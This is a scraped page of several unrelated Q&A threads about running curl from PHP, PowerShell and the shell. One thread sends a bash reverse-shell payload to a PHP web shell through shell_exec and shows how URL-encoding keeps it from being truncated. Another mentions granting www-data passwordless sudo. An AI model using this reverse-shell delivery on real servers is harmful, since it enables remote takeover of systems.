I can't seem to find any reference to the LH command this cURL command uses -- so I'm not entirely certain how to translate it to php
$ curl -LH "Accept: text/bibliography; style=mla; locale=fr-FR" http://dx.doi.org/10.1038/nrd842
curl -LH is just two flags L and H.
See: http://curl.haxx.se/docs/manpage.html
-L = Location
-H = Header
In your code, you should either swap your flags to -HL or swap your argument values.
Related
I was testing by sending some data using curl -d and retrieve the data in a PHP script using $_POST['data'],
My request is like
curl https://localhost/shell.php -d "data=shell_exec(\"/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.0.1/8888 0>&1 ' \");"
And the shell.php script is like:
var_dump($_POST['data']);
However, the output is truncated, I am only able to get:
shell_exec(\"/bin/bash -c '/bin/bash -i >
from $_POST['data'].
Can you try and escape \&
Like curl https://localhost/shell.php -d "data=shell_exec("/bin/bash -c '/bin/bash -i >\& /dev/tcp/192.168.0.1/8888 0>&1 ' ");"
?
The Cause
After doing some research, i think i find the root cause of this problem.
First, we have to understand some basic workflow of PHP runtime. When a http request is sent to fast-cgi, the workflow looks like below:
Some preprocess(i didn't research too much in this step)
Post request processed vim a bunch module:
cgi_main
SAPI
Some other code
PHP String Process
We can also find that there is a page about PHP default configuration and we can figure out that & is the default arg separator for input parameter.
According to all the information we have so far, we can conclude PHP runtime will receive the post data sent by curl and parse it automatically and during the process it will split parameter string based on the default separator.
In my case, if i sent the post request with -d, the & was not encoded and thus the data will be truncated by PHP at the first occurrence of &, which cause the following command to be abandoned.
The Solution
Use --data-url-encode instead of -d
curl https://localhost/shell.php --data-urlencode "data=shell_exec(\"/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.0.1/8888 0>&1 ' \");"
Note
Some times we see something like PG, SG and EG. They are PHP common macros from:
PHP
ZEND
SAPI
I'm trying to use jarun's "googler" in a PHP script in order to search YouTube and find the URL of the first result. The command I'm executing is googler --np --json -C -n 1 -w youtube.com -x <name of youtube video>, and it works perfectly on my local machine. Here is my code:
<?php
exec("googler --np --json -C -n 1 -w youtube.com -x thomas the dank engine", $results);
var_dump($results);
?>
When I execute this in the command line, it works perfectly as it should, but when I do it via a web browser or a GET request, it does not work. I am aware that it is being executed as another user. In my case, it's the user www-data, so I gave that user full sudo permissions without a password, and did the following commands:
sudo -u pi googler --np --json -C -n 1 -w youtube.com -x thomas the dank engine
as well as
su - pi -c 'googler --np --json -C -n 1 -w youtube.com -x thomas the dank engine'
neither of these worked. Does it have to do with googler? What am I doing wrong?
When adding 2>&1 to the command, I get the following error message:
stdout encoding 'ascii' detected. googler requires utf-8 to work properly. The wrong encoding may be due to a non-UTF-8 locale or an improper PYTHONIOENCODING. (For the record, your locale language is and locale encoding is ; your PYTHONIOENCODING is not set.) Please set a UTF-8 locale (e.g., en_US.UTF-8) or set PYTHONIOENCODING to utf-8.
Try putting:
putenv("PYTHONIOENCODING=utf-8");
in the script before calling exec(). googler apparently requires the locale or this environment variable to be set.
You must remove exec from the disable_functions parameter in the php.ini file for your server module installation of PHP (which is separate from your CLI installation). It is typically disabled by default for the server module.
So I've been tearing my hair out all day regarding this one. I have a curl command which I have working on a windows machine which pulls logs from Cloudflare, this works.
curl -sv -o logname.log.gz -X GET -H "Accept-encoding: gzip" -H "X-Auth-Email: myemail#email.com" -H "X-Auth-Key: 12345" "https://api.cloudflare.com/client/v4/zones/987654/logs/requests?start=1481509909&end=1481538709"
I'm trying to import this into powershell with the end goal of making the start and end time parameters different based on the current time, however I simply cannot get the command to run in powershell, I've tried various different tracks with this being the latest and most simple.
cmd.exe /c 'curl -sv -o logname.log.gz -X GET -H "Accept-encoding: gzip" -H "X-Auth-Email: myemail#email.com" -H "X-Auth-Key: 12345" "https://api.cloudflare.com/client/v4/zones/987654/logs/requests?start=1481509909&end=1481538709"'
Which gives me this error
{ [11971 bytes data]
* Failed writing body (0 != 11963)
* Failed writing data
* Curl_http_done: called premature == 1
* Closing connection 0
* schannel: shutting down SSL/TLS connection with api.cloudflare.com port 443
* schannel: clear security context handle
I already know that my unix timestamp is a bit off and plan on fixing that next but what I cannot understand is why the same command works through the command prompt and not through Powershell.
Would someone be able to help?
Thank you
Dealing with parameters to native commands in PowerShell can be a minefield because you have to deal with quoting and special characters for both, sometimes nested.
It's probably safer to use Start-Process in PowerShell and give it an array of parameters:
Start-Process curl.exe -ArgumentList '-sv','-o','logname.log.gz','-X','GET','-H','Accept-encoding: gzip','-H','X-Auth-Email:','myemail#email.com','-H','X-Auth-Key:','12345','https://api.cloudflare.com/client/v4/zones/987654/logs/requests?start=1481509909&end=1481538709'
But what you should realy do, is check out Invoke-WebRequest which will ultimately be much easier.
$body = #{
start = 1481509909
end = 1481538709
}
$headers = #{
'Accept-Encoding' = 'gzip'
'X-Auth-Email' = 'myemail#email.com'
'X-Auth-Key' = '12345'
}
$response = Invoke-WebRequest -Uri 'https://api.cloudflare.com/client/v4/zones/987654/logs/requests' -OutFile logname.log.gz -Body $body -Headers $headers
Note this is not tested at all, but should be a good starting point.
I have the following command line script right now:
df -h | curl -F stuff=test http://foo.com
Which will send an POST Request to foo.com. In the $_POST variable I have the following data set:
[stuff] => test
Now I want to change test with the output from df -h so I can see it in my $_POST variable.
How can I do this?
You can use xargs
df -h | xargs -I % curl -F stuff=% http://foo.com
What have you tried? This might accomplish the goal. Try it out and let me know.
curl -F "stuff=`df -h`" http://foo.com
So im trying to execute a terminal cURL command within a PHP script
The command in question
curl -H "public-api-token: mykeyhere" -X PUT -d "urlToShorten=google.com" https://api.shorte.st/v1/data/url
The response is a JSON and is as follows
{"status":"ok","shortenedUrl":"http:\/\/sh.st\/XXXX"}
I put it in my PHP script as follows, hoping it would add to a smaller and more effective code footprint
$cmd='curl -H "public-api-token: mysecretkey" -X PUT -d "urlToShorten=google.com" https://api.shorte.st/v1/data/url';
exec($cmd,$result);
print_r($result);
However the returned array is empty
The result is
Array ( )
exec() returns the last line of output, try using shell_exec().